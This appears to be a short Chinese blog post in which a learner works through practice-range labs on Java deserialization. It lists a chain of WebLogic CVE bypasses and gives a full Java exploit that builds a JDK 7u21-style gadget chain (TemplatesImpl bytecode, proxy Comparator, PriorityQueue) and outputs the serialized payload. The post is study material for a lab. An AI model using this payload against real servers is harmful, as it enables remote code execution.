最近复习下java一些基础，有些忘了，找到了个网上的靶场，适合我这种新手练习

lab6-8

感觉就是对应Weblogic这几个绕过

CVE-2015-4852->CVE-2016-0638->CVE-2016-3510->CVE-2017-3248->CVE-2018-2628->CVE-2018-2893->CVE-2018-????。感兴趣自己可以搜来看下，基本都差不多

lab9

最先开始我没意识到是7u21的改写。后面做了又回去复习了java漫谈才想起来

package Payload;

import Utils.Encode;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import javax.xml.transform.Templates;
import java.lang.reflect.Field;
import java.lang.reflect.Proxy;
import java.math.BigInteger;
import java.util.Comparator;
import java.util.PriorityQueue;

public class exp {

    public static void main(String[] args) throws Exception{
        TemplatesImpl tmpl = new TemplatesImpl();
        Field bytecodes = Reflections.getField(tmpl.getClass(),"_bytecodes");
        Reflections.setAccessible(bytecodes);
        Reflections.setFieldValue(tmpl,"_bytecodes",new byte[][]{SerializeUtil.getTemplatesImpl("xxxxxx")});

        Field name=Reflections.getField(tmpl.getClass(),"_name");
        Reflections.setAccessible(name);
        Reflections.setFieldValue(tmpl,"_name","s");
        Reflections.setFieldValue(tmpl, "_tfactory", new TransformerFactoryImpl());


        MyInvocationHandler s = new MyInvocationHandler(Templates.class);
        Comparator  comparator = (Comparator) Proxy.newProxyInstance(exp7.class.getClassLoader(), new Class[]{ Comparator.class },s);


        PriorityQueue<Object> queue = new PriorityQueue(2);
        queue.add(new BigInteger("1"));
        queue.add(new BigInteger("2"));
        Object[] queueArray = (Object[])((Object[]) marshalsec.util.Reflections.getFieldValue(queue, "queue"));
        queueArray[0] = tmpl;

        Field field = Class.forName("java.util.PriorityQueue").getDeclaredField("comparator");
        field.setAccessible(true);
        field.set(queue, comparator);
        System.out.print(Encode.objectToHexString(queue));
    }
}